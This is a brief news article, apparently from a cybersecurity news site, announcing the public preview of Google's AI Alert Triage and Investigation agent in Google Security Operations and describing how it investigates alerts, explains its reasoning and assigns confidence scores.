Google has announced the public preview of its Alert Triage and Investigation agent, a significant advancement in artificial intelligence-driven security operations.
The intelligent agent is now embedded directly within Google Security Operations, helping security teams process alerts faster and more effectively.
The new agent represents a significant step toward Google’s vision of an “Agentic SOC,” a security operations center powered by intelligent automation.
Instead of having security analysts check every alert by hand, the agent checks them itself, collects information, and decides whether they are real threats or harmless.
This capability allows security teams to focus their attention on alerts that genuinely require human expertise.
During private preview testing, the agent investigated hundreds of thousands of alerts across various organizations and industries.
Feedback from financial services firms and major retailers revealed substantial time savings. Google analysts reported that the agent’s comprehensive investigation summaries enabled faster decision-making.
While consolidating complex information that would otherwise require manual queries and analysis.
The investigation process begins when alerts are generated in Google’s detection engine. The agent reviews each alert and creates a dynamic investigation plan on line with Mandiant experts’ best practices.
How the Agent Works
It then executes multiple analytical capabilities, including YARA-L searches, to retrieve relevant events.
Threat intelligence enrichment using Google Threat Intelligence, command-line analysis for encoded or obfuscated commands, and process tree reconstruction to understand the full scope of potential attacks.
After completing its investigation, the agent decides whether the alert is real and assigns a confidence score indicating how sure it is.
Google emphasizes explainability throughout the agent’s process. The system references its sources and outlines investigation steps so analysts understand how recommendations were reached.
The company uses multiple evaluation techniques, including comparisons with human experts and AI evaluation methods, to ensure accuracy and continuous improvement.
All eligible Google Security Operations Enterprise and Enterprise Plus users can opt into the public preview immediately by clicking the Gemini icon within Google Security Operations.
Investigations begin automatically after enrollment, though users can also trigger investigations manually. Google plans to bring the agent to general availability in 2026 with additional enhancements to investigation depth and workflow integration.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
